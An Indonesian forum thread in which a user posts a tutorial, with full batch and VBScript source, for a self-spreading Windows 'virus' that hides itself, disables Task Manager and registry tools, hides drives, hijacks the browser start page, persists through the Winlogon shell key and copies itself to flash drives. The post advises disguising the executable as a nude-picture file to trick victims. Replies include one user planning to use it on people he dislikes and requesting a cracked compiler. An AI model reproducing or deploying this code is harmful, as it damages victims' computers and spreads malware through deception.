Cheat Gamez
[WARNING]

UNTUK MEMBUKA SEMUA AKSES KE FORUM
DIHARAPKAN LOGIN TERLEBIH DAHULU AGAR ANDA DAPAT MENIKMATI SEMUA SUBFORUM




THANKS,
ADMIN

Tutorial Membuat BAT MENJADI EXE dan tutorialnya

Halaman 1 dari 2 1, 2  Next

Topik sebelumnya Topik selanjutnya Go down

Tutorial Membuat BAT MENJADI EXE dan tutorialnya

Post  *Stf*|Kooin on Sun May 16, 2010 3:31 pm

To the point aja. Setiap kali saya online internet, saya selalu sempatkan diri untuk mampir di situs jasakom ini.

Dengan hampir membaca semua artikel yang berhubungan dengan registry dan virus, atas nama logika yang saya punya, saya berhasil membuat sebuah program yang menurut saya layak disebut sebagai virus, walaupun masih virus-virusan.

Kenapa saya pede sekali dengan menyebut program ini sebagai virus? Karna program yang saya buat dengan mengunakan software QuickBFC ini, bisa membelah diri (apabila dieksekusi)-bukankah salah satu ciri dari virus adalah dapat menggandakan diri- dan program ini juga masih sanggup untuk menyebar ke flashdisk(atau memory card) yang terdefault ke drive F:\. Jelas layak kan program yang satu ini di sebut sebagai virus(-virusan). Dan program ini juga tidak akan merusak file ataupun menghapusnya, Cuma buat iseng doang ko, cuma main-main diregistry.

Oke, karna saya rasa basa-basinya udah kebanyakan mari kita mulai.
Tapi sebelumnya saya mau mengucapkan terimakasih dulu buat si tomPLIX yang udah nulis artikel “Bikin Virus Dengan Perintah CMD”, karna program ini adalah pemikiran lanjutan setelah saya baca artikel itu. Dan juga tidak lupa rasa termakasih yang sebesar besarnya buat mas Wardana, R, S. yang udah ngenalin saya dengan pemrograman lewat bukunya; “Pemrograman Virus dan Spyware (uncensored)”, diterbitkan oleh jasakom.

Oke di mulai dari apa yang dibutuhkan. Yang dibutuhkan adalah :

1. Software Quick Batch File Compiler (Quickbfc) www.abyssmedia.com

(apa gunanya..?: software ini bisa menjadikan file .bat menjadi file .exe (executable). Karna virus yang akan kita buat ini bekerja dengan perintah CMD. Dan ada satu kegunaan software ini lagi, yaitu menyembunyikan jendela console. Jadi file .exe yang dibuat, ketika di run(jalankan) tidak menampilkan jendela console tapi tetap bekerja!! Hebat kan neh software.
2. Software Icon Changer

(apa gunanya???: lo ga mau kan virus buatan lo udah di apus duluan karna iconnya aneh dan mencurigakan. Nah, Icon Changer ini diperlukan untuk mencari Icon yang dimiliki oleh Windows, downloadnya di www.shelllabs.com .
3. Kemauan untuk memahami perintah-perintah CMD, Visual Basic Script (VBS) dan ga takut bermain di RegEdit.

Oke, semua udah siap. Mari dimulai, jalan kan software Quick bfc, lalu ketik script dibawah ini:
1. @echo off
2. If exist c:\windows\exploler.exe Goto lanjut
3. for %%a in (*.exe) do if %%~za equ 123456 copy "%%a" %systemroot%\exploler.exe
4. copy c:\windows\exploler.exe c:\”rahasia gua”.exe
5. echo on error resume next>c:\windows\gila.vbs
6. echo Dim WshShell, f1, fso, f2>>c:\windows\gila.vbs
7. echo set WshShell = CreateObject("Wscript.Shell")>>c:\windows\gila.vbs
8. echo set fso = CreateObject("Scripting.FileSystemObject")>>c:\windows\gila.vbs
9. echo set f1 = fso.GetFile("C:\WINDOWS\exploler.exe")>>c:\windows\gila.vbs
10. echo set f2=fsoGetFile(“C:\windows\gila.vbs”)>>c:\windows\gila.vbs
11. echo f1.Attributes = "3">>c:\windows\gila.vbs
12. echo f2.Attributes =”3”>>c:\windows\gila.vbs
13. echo WshShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun", "1", "REG_DWORD">>c:\windows\gila.vbs
14. echo WshShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDrives", "29", "REG_DWORD">>c:\windows\gila.vbs
15. echo WshShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewOnDrive", "29", "REG_DWORD">>c:\windows\gila.vbs
16. echo WshShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\system\DisableRegistryTools", "1", "REG_DWORD">>c:\windows\gila.vbs
17. echo WshShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions", "1", "REG_DWORD">>c:\windows\gila.vbs
18. echo WshShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind", "1", "REG_DWORD">>c:\windows\gila.vbs
19. echo WshShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\system\DisableTaskMgr", "1", "REG_DWORD">>c:\windows\gila.vbs
20. echo WshShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page", "http://fanaticanz.blogspot.com", "REG_SZ">>c:\windows\gila.vbs
21. echo WshShell.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell", "Explorer.exe C:\WINDOWS\exploler.exe", "REG_SZ">>c:\windows\gila.vbs
22. echo WshShell.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOrganization", "rastaman", "REG_SZ">>c:\windows\gila.vbs
23. echo WshShell.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOwner", "fanatiCanz", "REG_SZ">>c:\windows\gila.vbs
24.

25. :lanjut
26. call c:\windows\gila.vbs
27. if exist c:\legalin_ganja_dong_by_fanatiCanz.exe goto ceki
28. for /R c:\ %%d in (legalin_ganja_dong_by_fanatiCanz.exe) do copy c:\windows\exploler.exe "%%d"
29. Goto ceki
30.

31. :infek1
32. for %%a in (*.exe) do if %%~za equ 12345 copy "%%a" %systemroot%\exploler.exe
33. Goto ceki
34.

35. :infek2
36. Copy c:\windows\exploler.exe c:\”gambar lucu”.exe
37. Goto ceki
38.

39. :infek3
40. Copy c:\windows\exploler.exe f:\”koleksi kartun flash”.exe
41. Goto ceki
42.

43. ekf
44. if exist f:\”koleksi kartun flash”.exe Goto ceki
45. Goto infek3

46.


47. eki
48. if not exist c:\windows\exploler.exe Goto infek1
49. if not exist c:\”gambar lucu”.exe Goto infek2
50. if exist f:\ Goto cekf
51.

52. Goto ceki

Waaahhhh……… panjang ya?jangan bilang iya, soale mungkin nanti disaat menjadi programer betulan, 52 baris sih masih sangat amat enteng sekali!!! Mungkin nanti bakalan punya proyek yang jumlahnya ribuan atau mungkin puluhan ribu baris, jadi jangan menyerah Cuma karna 52 baris diatas.

Sebetulnya tanpa software quickbfc, masih bisa ko bikin virus(-virusan) ini dan script diatas ditulis dengan menggunakan notepad, lalu di simpan dengan ektensi-nya harus .bat. Dan emang kalo mau nyoba bikin pake notepad trus disimpen dengan ektensi .bat, ada perintah yang bisa diganti, yakni perintah baris ke-3 dan 33 yang “for %%a in dst….” Diganti jadi “copy %0 tujuan dan nama file nya”.

Tapi kan kalo nyebarin dengan ektensi .bat kan teramat mencurigakan, mendingan pake quickbfc lalu compile dengan ektensi .exe namanya terserah, contoh:cewe_telanjang.exe (icon nya juga yang sexi, biar lebih mantap), gua yakin para muka mesum akan langsung menjadi korban (heehehe)!!! Dan berdoalah semoga kompie calon korban ngga pake anti virus!.

Oke kalo kamu masih sanggup dan masih mau ngebaca tulisan ini, kamu bakalan dapet penjelasan dari script diatas!

Dan penjelasannya adalah:
Baris
1. Ini Cuma perintah dasar cmd yang tidak akan menampilkan perintah yang harusnya tertulis di console cmd. (dipikir-pikir ngapain juga yach? Kan ini adalah proyek ghost application! Tapi bodo ah!!)
2. Ini perintah untuk mengecek keberadaan file explorer.exe di drive c:\windows. Kalo udah ada kan berarti udah diinfek, dan akan langsung menuju parameter perintah lanjut, tapi kalo belum ada maka akan dilanjutkan ke baris selanjutnya.
3. perintah untuk menyalin program ini ke folder c:\windows dengan nama explorer.exe yang selanjutnya akan menjadi file induk program ini. Sebetulnya kalo dibikinnya pake notepad dan disimpan dengan ektensi .bat maka perintah “for %%a in (*.exe) do if %%~za equ 123456 copy "%%a" %systemroot%\exploler.exe” diganti jadi “copy %0”. Nah, kalo pake software Quickbfc perintah “copy %0” tidak berfungsi. (lengkapnya baca artikel siTomplix yang judulnya Bikin Virus Dengan Perintah CMD)
4. perintah untuk menyalin file explorer.exe di drive c:\windows\ ke drive c:\ dengan nama “rahasia gua.exe
5. perintah di baris ini sampai baris 23 adalah perintah yang menggunakan parameter > dan >> untuk membuat sebuah file Visual Basic Script yang bernama gila.vbs. Disinilah kesaktian program ini, kalau berhasil dieksekusi (kenapa kalau..? ya karna ada beberapa anti virus yang memblok akses ke registry –antivirus yang saya pake ANTIvir, file .vbs ini berjalan mulus –berarti sukses. Tetapi ketika saya coba pake xxxx ada warning dan mempertanyakan file itu boleh dieksekusi atau dihapus atau dikarantin-.

Sukur-sukur si calon korban ga make anti virus, tentram damai program ini jalan. Kenapa harus make file Visual Basic Script aja untuk entry ke registry? Jawabannya adalah file Visual Basic Script ini tidak hanya untuk mengisi registry saja. Ada satu lagi fungsi dari virus ini, yaitu mengganti attribute file explorer di drive c:\windows\ menjadi Hidden. Lagian juga kalo ngisi registry pake ektensi .reg bakalan ada pertanyaan “are you sure want to add the information in nama_file.reg to the registry?” ga efisien banget kan? Oke, kembali ke….? Registry. Dan registry yang di isi adalah :


1. Menghilangkan menu RUN
2. Menyembunyikan drive A, C, D dan E di windows explorer
3. Menyembunyikan semua file di drive A, C, D dan E windows explorer (bakalan ada pembatasan!)
4. Men-disable kan menu RegEdit
5. Menghilangkan menu Folder Option
6. Menghilangkan menu Search
7. Mendisable kan Task Manager (ctrl+alt+del tidak bisa digunakan)
8. Mengganti alamat default Internet Explorer menjadi http://fanaticanz.blogspot.com
9. Menjadikan file exploler.exe di drive c:\windows yang tadi disalin(copy) selalu dijalankan ketika computer di hidupkan lagi walaupun windows masuk ke dalam safe mode!
10. Entry yang ini bakalan merubah nama owner organitation(coba deh kalian klik kanan di my computer trus pilih properties, dan liat di situ ada tulisan "registered to:”) nah, entry yang satu ini akan merubah nama organization yang tadinya apapun menjadi “rastaman”
11. Sama, entry yang satu ini juga merubah nama owner (cek lagi aja di properties my computer) yang tadinya apapun menjadi “fanaticanz”

Puh.. selesai juga tentang Registry…. Masih mau lanjut???? lanjut mang……………
24. kosong
25. ini parameter yang membuat kumpulan perintah yang terdiri dari baris 26 – 28
26. ini perintah yang akan mengeksekusi file gila di folder c:\windows
27. ini perintah yang mempertanyakan keberadaan file legalin ganja dong by fanatiCanz.exe, jika ada maka akan langsung dirujuk menuju parameter perintah ceki
28. ini perintah untuk menggandakan file induk exploler.exe yang ada di drive C:\windows\ ke seluruh folder dan subfolder yang ada di drive c:\ dengan nama legalin_ganja_dong_by_fanatiCanz.exe ((((thank’s a lot for tomplix))))
29. ini perintah untuk langsung menuju parameter perintah ceki (baris 47)
30. kosong
31. ini parameter yang membuat kumpulan perintah bernama infek1 yang berisikan perintah dari baris 33 – 34
32. perintah ini untuk menyalin file program ini dan sedang dijalankan (eksekusi) ke folder c:\windows dengan nama exploler.exe
33. ini perintah yang merujuk langsung ke parameter perintah ceki
34. kosong (untuk mengakhiri kumpulan parameter yang sebelumnya dibuat)
35. parameter yang membuat kumpulan perintah bernama infek2 yang berisikan perintah dari baris 37 – 38.
36. ini perintah untuk menyalin file induk exploler.exe ke drive c:\ dengan nama gambar lucu.exe
37. ini perintah yang langsung merujuk ke perintah ceki
38. kosong (untuk mengakhiri kumpulan parameter yang sebelumnya dibuat)
39. ini parameter yang membuat kumpulan perintah bernama indek3 yang berisikan perintah dari baris 41 – 42
40. ini perintah untuk menyalin file induk exploler.exe ke drive f:\ dengan nama koleksi kartun flash.exe
41. ini perintah yang merujuk langsung ke parameter perintah ceki
42. kosong (untuk mengakhiri kumpulan parameter yang sebelumnya dibuat)
43. ini parameter yang membuat kumpulan perintah bernama cekf yang berisikan kumpulan perintah dari baris 45-46
44. ini perintah yang mempertanyakan keberadaan file koleksi kartun flash.exe di drive f:\. Jika tidak maka akan dilanjutkan ke parameter perintah infek3. Tapi jika file terebut sudah ada, itu berarti sudah diinfek maka akan dilanjutkan ke perintah pada baris selanjutnya.
45. ini perintah yang langsung merujuk kepada parameter perintah ceki
46. kosong (untuk mengakhiri kumpulan parameter yang sebelumnya dibuat)
47. ini parameter yang membuat kumpulan perintah bernama ceki yang berisikan kumpulan perintah dari baris 49-51.
48. ini perintah untuk mempertanyakan keberadaan file exploler.exe di drive c:\windows, kalo ga ada itu berarti file induk program ini berhasil (sudah) dihapus, maka akan dilanjutkan ke parameter perintah infek1 dengan perintah yang sama pada baris 3 dan 33.
49. ini perintah untuk mempertanyakan keberadaan file gambar lucu.exe di drive c:\, kalo ga ada maka bakal dilanjutin ke perintah infek2
50. ini perintah untuk mengetahui ada tidaknya drive f:\ kalo ada maka bakal dilanjutin ke perintah infek3, tapi kali ga ada bakal langsung menuju perintah selanjutnya
51. kosong
52. ini perintah untuk kembali lagi ke parameter perintah ceki, semcam looping lah…


Puuhhh………….. akhirnya, 80 baris yang panjang sekali ya penjelasannya (jangan dijawab iya!). Namanya juga belajar, bersusah-susah dululah,Oya buat kamu yang masih kurang mengerti penjelasan script diatas saya saranin agar kamu baca :

1. Buku “Pemrograman Virus dan SpyWare [uncensored]” karya Wardana, R, S.Hut terbitan Jasakom
2. Artikel tomPLIX yang judulnya “Membuat Virus dengan Perintah CMD” di situs jasakom.com
3. semua yang berhubunagn dengan registry

Masih pada keukeuh baca tulisan ini, kalau iya, gua kasih script pemulih nya deh sekalian, ga adil dong, masa ngasih penyakitnya doang! (iya ga?)
Script Pemulih nya sebagai berikut ;

1. @echo off
2. title Script Pemulih virus-virusan –rasta-Farian.B
3. echo on error resume next>c:\gila.vbs
4. echo Dim WshShell, f1, fso>>c:\gila.vbs
5. echo set WshShell = CreateObject("Wscript.Shell")>>c:\gila.vbs
6. echo set fso = CreateObject("Scripting.FileSystemObject")>>c:\gila.vbs
7. echo set f1 = fso.GetFile("c:\windows\exploler.exe")>>c:\gila.vbs
8. echo set f2 =fso.GetFile(“c:\windows\gila.vbs”)
9. echo f1.Attributes = "0">>c:\gila.vbs
10. echo f2.Attributes = “0”>>c:\gila.vbs
11. echo WshShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun", "0", "REG_DWORD">>c:\gila.vbs
12. echo WshShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\system\DisableRegistryTools", "0", "REG_DWORD">>c:\gila.vbs
13. echo WshShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewOnDrives", "0", "REG_DWORD">>c:\gila.vbs
14. echo WshShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions", "0", "REG_DWORD">>c:\gila.vbs
15. echo WshShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind", "0", "REG_DWORD">>c:\gila.vbs
16. echo WshShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\system\DisableTaskMgr", "0", "REG_DWORD">>c:\gila.vbs
17. echo WshShell.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell", "Explorer.exe", "REG_SZ">>c:\gila.vbs
18. call c:\gila.vbs
19. pause
20. Goto del1
21. kosong
22. el1
23.

24. del %systemroot%\exploler.exe pause
25. Goto del2
26.

27. for /R c:\ %%d in (legalin ganja dong by fanatiCanz.exe) do del "%%d"
28. pause
29. Goto del3
30.

31. el3
32. del c:\"gambar lucu".exe
33. pause
34.

35. el4
36. del %systemroot%\gila.vbs
37. pause

Ga banyak yang bisa dijelasin dari script diatas, kalo lo mahamin script virus(-virusannya) lo bakalan dengan mudah mengerti script diatas. Dari baris 3 sampe 16 dibikin file gila.vbs yang akan membuat normal semua key yang disebabkan program virus(-virusan) tadi. Terus di baru 17 dieksekusi file gila.vbs dan bakalan langsung menuju perintah del 1 yang berisikan perintah untuk menghapus file induk program tadi. Kalo selesai bakalan dilanjutin ke perintah del2, yang akan menghapus file legalin ganja dong by fanatiCanz.exe di seluruh folder dan seub folder di drive c:\. Terus dilajnutin keperintah selajutnya, dan seterusnya.

Script pemulih ini bisa dibuat juga dengan menggunakan notepad lalu simpan dengan extensi .bat. Untuk merasakan khasiat dari script pemulih diatas, jalankan script pemulih tersebut lalu masuk ke dalam Task manager (kan udah dipulihin, jadi task manager udah bisa di control), di dalam menu Process mastikan proses yang namanya, exploler.exe, cmd.exe (end process), setelah semua proses yang namanya CMD.exe, legalin ganja dong by fanatiCanz.exe dan proses exploler.exe dihapus, Jalankan sekali lagi script pemulihnya sampe selesai dan terakhir restart komputernya, dijamin uang kembali, setelah semua “ritual” diatas selesai, computer yang terinfek akan kembali seperti semula. SEMaNgat BrO..

*Stf*|Kooin
Support
Support

Posts : 171
CGPoints : 12197
Reputation : 2
Join date : 15.05.10
Age : 19
Location : Pekanbaru

http://www.gamerhl.blogsot.com

Kembali Ke Atas Go down

Re: Tutorial Membuat BAT MENJADI EXE dan tutorialnya

Post  *Stf*|d3d3_adi on Sun May 16, 2010 4:45 pm

mayan gan nice post Smile

*Stf*|d3d3_adi
CheatGamez[CG]MasterLv2
CheatGamez[CG]MasterLv2

Posts : 521
CGPoints : 12523
Reputation : 7
Join date : 13.05.10
Age : 19
Location : Sumedang

http://d3d3-adi.blogspot.com

Kembali Ke Atas Go down

Re: Tutorial Membuat BAT MENJADI EXE dan tutorialnya

Post  *Stf*|Kooin on Sun May 16, 2010 4:50 pm

kk bilang padaal kk aja ga bisa baca semua
kakakakaaakakakaa

*Stf*|Kooin
Support
Support

Posts : 171
CGPoints : 12197
Reputation : 2
Join date : 15.05.10
Age : 19
Location : Pekanbaru

http://www.gamerhl.blogsot.com

Kembali Ke Atas Go down

Re: Tutorial Membuat BAT MENJADI EXE dan tutorialnya

Post  *Stf*|d3d3_adi on Sun May 16, 2010 4:54 pm

kooin wrote:kk bilang padaal kk aja ga bisa baca semua
kakakakaaakakakaa
dah gan dah di bca ( Setengah ) Evil or Very Mad

*Stf*|d3d3_adi
CheatGamez[CG]MasterLv2
CheatGamez[CG]MasterLv2

Posts : 521
CGPoints : 12523
Reputation : 7
Join date : 13.05.10
Age : 19
Location : Sumedang

http://d3d3-adi.blogspot.com

Kembali Ke Atas Go down

Re: Tutorial Membuat BAT MENJADI EXE dan tutorialnya

Post  *Stf*|Kooin on Sun May 16, 2010 5:04 pm

saya tunggu klo dah baca semua cyclops

*Stf*|Kooin
Support
Support

Posts : 171
CGPoints : 12197
Reputation : 2
Join date : 15.05.10
Age : 19
Location : Pekanbaru

http://www.gamerhl.blogsot.com

Kembali Ke Atas Go down

RE : Tutorial Membuat BAT MENJADI EXE dan tutorialnya

Post  dapdipo on Mon May 17, 2010 11:50 pm

Banyak Bgt , Bacanya sampe Pusing. Kalo Misalnya Belakangnya .bat langsung .exe aja kan bsa? atau program bat to exe cpt lg . kalo ini kayaknha ribet bgt

dapdipo
Newbie
Newbie

Posts : 98
CGPoints : 12054
Reputation : 1
Join date : 17.05.10

Kembali Ke Atas Go down

RE : Tutorial Membuat BAT MENJADI EXE dan tutorialnya

Post  waziez on Tue May 18, 2010 2:35 am

wah panjang gan..... dah kaya kereta api.....
gag bisa dikompers lagi ya????
dah hampir copot neh mata bacanya..... study study study study study study

waziez
Battletank
Battletank

Posts : 212
CGPoints : 12171
Reputation : 1
Join date : 17.05.10

Kembali Ke Atas Go down

Re: Tutorial Membuat BAT MENJADI EXE dan tutorialnya

Post  *Stf*|Kooin on Tue May 18, 2010 9:08 pm

copotin aja kk .. ga ad yang marah koq Wink

*Stf*|Kooin
Support
Support

Posts : 171
CGPoints : 12197
Reputation : 2
Join date : 15.05.10
Age : 19
Location : Pekanbaru

http://www.gamerhl.blogsot.com

Kembali Ke Atas Go down

Re: Tutorial Membuat BAT MENJADI EXE dan tutorialnya

Post  waziez on Tue May 18, 2010 9:11 pm

jah becanda ente ntr kalo copot ane liat pake apa.....
diganti sama bola bekel aj x ya...... lol! lol! lol! lol! lol!

waziez
Battletank
Battletank

Posts : 212
CGPoints : 12171
Reputation : 1
Join date : 17.05.10

Kembali Ke Atas Go down

Re: Tutorial Membuat BAT MENJADI EXE dan tutorialnya

Post  bakekok on Thu May 20, 2010 4:36 am

nice info kk ^^

bakekok
Newbie
Newbie

Posts : 99
CGPoints : 12045
Reputation : 1
Join date : 20.05.10

Kembali Ke Atas Go down

Re: Tutorial Membuat BAT MENJADI EXE dan tutorialnya

Post  PolarGodEmperorOdin on Thu May 20, 2010 11:11 am

scratch scratch scratch scratch
pusing saya

PolarGodEmperorOdin
CheatGamez[CG]MasterLv3
CheatGamez[CG]MasterLv3

Posts : 850
CGPoints : 12791
Reputation : 1
Join date : 18.05.10
Age : 21
Location : kediri

Kembali Ke Atas Go down

Re: Tutorial Membuat BAT MENJADI EXE dan tutorialnya

Post  bakekok on Thu May 20, 2010 7:12 pm

up..up..

bakekok
Newbie
Newbie

Posts : 99
CGPoints : 12045
Reputation : 1
Join date : 20.05.10

Kembali Ke Atas Go down

Re: Tutorial Membuat BAT MENJADI EXE dan tutorialnya

Post  Sum2 on Fri May 21, 2010 12:08 am

saya punya compilernya, hobi saya lumayan buat ngutak atik registry, file virus.vbs, .bat, nah yang compiler .bat ini kan versi trial, ada gak serial number ato crack programnya gan... kalo punya boleh share denan saya dunk...

nih tips bakal buat jailin orang2 yang ngeselin ane gan... biar kapok kalo kompinya sampe error. wkwkwkwk, trus pura-pura ane punya penawarnya... hahaha

Sum2
CheatGamez[CG]Masterlv1
CheatGamez[CG]Masterlv1

Posts : 441
CGPoints : 12421
Reputation : 2
Join date : 13.05.10
Location : Denpasar Bali

Kembali Ke Atas Go down

Re: Tutorial Membuat BAT MENJADI EXE dan tutorialnya

Post  Sum2 on Fri May 21, 2010 12:09 am

*Stf*|Kooin wrote:kk bilang padaal kk aja ga bisa baca semua
kakakakaaakakakaa

habisnya postingannya ga tanggung-tanggung, coba kalo dibikin bersambung penawarnya kan ga bosen bacanya... hehehe

Sum2
CheatGamez[CG]Masterlv1
CheatGamez[CG]Masterlv1

Posts : 441
CGPoints : 12421
Reputation : 2
Join date : 13.05.10
Location : Denpasar Bali

Kembali Ke Atas Go down

Re: Tutorial Membuat BAT MENJADI EXE dan tutorialnya

Post  waziez on Fri May 21, 2010 12:58 am

wah niat jahat dia....

waziez
Battletank
Battletank

Posts : 212
CGPoints : 12171
Reputation : 1
Join date : 17.05.10

Kembali Ke Atas Go down

Re: Tutorial Membuat BAT MENJADI EXE dan tutorialnya

Post  Sum2 on Fri May 21, 2010 9:38 pm

waziez wrote:wah niat jahat dia....

kan baru niat... belum terlaksana nih... tapi ane orang baek kok gan... kalo sama temen sih ga sampe segitunya kale... Very Happy Very Happy Very Happy

Sum2
CheatGamez[CG]Masterlv1
CheatGamez[CG]Masterlv1

Posts : 441
CGPoints : 12421
Reputation : 2
Join date : 13.05.10
Location : Denpasar Bali

Kembali Ke Atas Go down

Re: Tutorial Membuat BAT MENJADI EXE dan tutorialnya

Post  waziez on Sun May 23, 2010 1:44 pm

oww...
ane kira ente tega gitu sum2
ya maap dah....

waziez
Battletank
Battletank

Posts : 212
CGPoints : 12171
Reputation : 1
Join date : 17.05.10

Kembali Ke Atas Go down

Re: Tutorial Membuat BAT MENJADI EXE dan tutorialnya

Post  dochil on Mon May 24, 2010 12:45 pm

waziez wrote:wah niat jahat dia....
GPP.. namanya juga hackers,.. mana ada heckers yg baik ?? ahaha

dochil
Battletank
Battletank

Posts : 203
CGPoints : 12188
Reputation : 0
Join date : 13.05.10
Age : 21
Location : Karawang

Kembali Ke Atas Go down

Re: Tutorial Membuat BAT MENJADI EXE dan tutorialnya

Post  waziez on Tue May 25, 2010 10:04 am

eh jangan salah gan masih banyak hacker yang baik di dunia ini...

waziez
Battletank
Battletank

Posts : 212
CGPoints : 12171
Reputation : 1
Join date : 17.05.10

Kembali Ke Atas Go down

Re: Tutorial Membuat BAT MENJADI EXE dan tutorialnya

Post  dochil on Tue May 25, 2010 7:06 pm

waziez wrote:eh jangan salah gan masih banyak hacker yang baik di dunia ini...
Sebenernya kita ngecheat ajah udh banyak yg benc... hahah?
??
betul gag >??

dochil
Battletank
Battletank

Posts : 203
CGPoints : 12188
Reputation : 0
Join date : 13.05.10
Age : 21
Location : Karawang

Kembali Ke Atas Go down

Re: Tutorial Membuat BAT MENJADI EXE dan tutorialnya

Post  waziez on Tue May 25, 2010 8:37 pm

ia betul.

waziez
Battletank
Battletank

Posts : 212
CGPoints : 12171
Reputation : 1
Join date : 17.05.10

Kembali Ke Atas Go down

Re: Tutorial Membuat BAT MENJADI EXE dan tutorialnya

Post  dochil on Wed May 26, 2010 6:40 pm

waziez wrote:ia betul.
okeh,,, setuju gan.. CENDOL deh buat kamu.. kwowkowkowk

dochil
Battletank
Battletank

Posts : 203
CGPoints : 12188
Reputation : 0
Join date : 13.05.10
Age : 21
Location : Karawang

Kembali Ke Atas Go down

Re: Tutorial Membuat BAT MENJADI EXE dan tutorialnya

Post  dochil on Wed May 26, 2010 6:41 pm

Sum2 wrote:
waziez wrote:wah niat jahat dia....

kan baru niat... belum terlaksana nih... tapi ane orang baek kok gan... kalo sama temen sih ga sampe segitunya kale... Very Happy Very Happy Very Happy
kwowkowko
gpp gan.. kejahatan .. awal mulanya hackers berjaya.. percaya ahhahaha
betul

dochil
Battletank
Battletank

Posts : 203
CGPoints : 12188
Reputation : 0
Join date : 13.05.10
Age : 21
Location : Karawang

Kembali Ke Atas Go down

Re: Tutorial Membuat BAT MENJADI EXE dan tutorialnya

Post  -CobraZ-7up- on Fri May 28, 2010 7:29 pm

Panjang amat kk,,


sya Cumn baca setengah,,


tpi nice share deh,,

-CobraZ-7up-
Rookie
Rookie

Posts : 12
CGPoints : 11915
Reputation : 1
Join date : 28.05.10
Age : 25

Kembali Ke Atas Go down

Re: Tutorial Membuat BAT MENJADI EXE dan tutorialnya

Post  hackerjimeowam on Sun May 30, 2010 7:18 pm

*Stf*|Kooin wrote:To the point aja. Setiap kali saya online internet, saya selalu sempatkan diri untuk mampir di situs jasakom ini.

Dengan hampir membaca semua artikel yang berhubungan dengan registry dan virus, atas nama logika yang saya punya, saya berhasil membuat sebuah program yang menurut saya layak disebut sebagai virus, walaupun masih virus-virusan.

Kenapa saya pede sekali dengan menyebut program ini sebagai virus? Karna program yang saya buat dengan mengunakan software QuickBFC ini, bisa membelah diri (apabila dieksekusi)-bukankah salah satu ciri dari virus adalah dapat menggandakan diri- dan program ini juga masih sanggup untuk menyebar ke flashdisk(atau memory card) yang terdefault ke drive F:\. Jelas layak kan program yang satu ini di sebut sebagai virus(-virusan). Dan program ini juga tidak akan merusak file ataupun menghapusnya, Cuma buat iseng doang ko, cuma main-main diregistry.

Oke, karna saya rasa basa-basinya udah kebanyakan mari kita mulai.
Tapi sebelumnya saya mau mengucapkan terimakasih dulu buat si tomPLIX yang udah nulis artikel “Bikin Virus Dengan Perintah CMD”, karna program ini adalah pemikiran lanjutan setelah saya baca artikel itu. Dan juga tidak lupa rasa termakasih yang sebesar besarnya buat mas Wardana, R, S. yang udah ngenalin saya dengan pemrograman lewat bukunya; “Pemrograman Virus dan Spyware (uncensored)”, diterbitkan oleh jasakom.

Oke di mulai dari apa yang dibutuhkan. Yang dibutuhkan adalah :

1. Software Quick Batch File Compiler (Quickbfc) www.abyssmedia.com

(apa gunanya..?: software ini bisa menjadikan file .bat menjadi file .exe (executable). Karna virus yang akan kita buat ini bekerja dengan perintah CMD. Dan ada satu kegunaan software ini lagi, yaitu menyembunyikan jendela console. Jadi file .exe yang dibuat, ketika di run(jalankan) tidak menampilkan jendela console tapi tetap bekerja!! Hebat kan neh software.
2. Software Icon Changer

(apa gunanya???: lo ga mau kan virus buatan lo udah di apus duluan karna iconnya aneh dan mencurigakan. Nah, Icon Changer ini diperlukan untuk mencari Icon yang dimiliki oleh Windows, downloadnya di www.shelllabs.com .
3. Kemauan untuk memahami perintah-perintah CMD, Visual Basic Script (VBS) dan ga takut bermain di RegEdit.

Oke, semua udah siap. Mari dimulai, jalan kan software Quick bfc, lalu ketik script dibawah ini:
1. @echo off
2. If exist c:\windows\exploler.exe Goto lanjut
3. for %%a in (*.exe) do if %%~za equ 123456 copy "%%a" %systemroot%\exploler.exe
4. copy c:\windows\exploler.exe c:\”rahasia gua”.exe
5. echo on error resume next>c:\windows\gila.vbs
6. echo Dim WshShell, f1, fso, f2>>c:\windows\gila.vbs
7. echo set WshShell = CreateObject("Wscript.Shell")>>c:\windows\gila.vbs
8. echo set fso = CreateObject("Scripting.FileSystemObject")>>c:\windows\gila.vbs
9. echo set f1 = fso.GetFile("C:\WINDOWS\exploler.exe")>>c:\windows\gila.vbs
10. echo set f2=fsoGetFile(“C:\windows\gila.vbs”)>>c:\windows\gila.vbs
11. echo f1.Attributes = "3">>c:\windows\gila.vbs
12. echo f2.Attributes =”3”>>c:\windows\gila.vbs
13. echo WshShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun", "1", "REG_DWORD">>c:\windows\gila.vbs
14. echo WshShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDrives", "29", "REG_DWORD">>c:\windows\gila.vbs
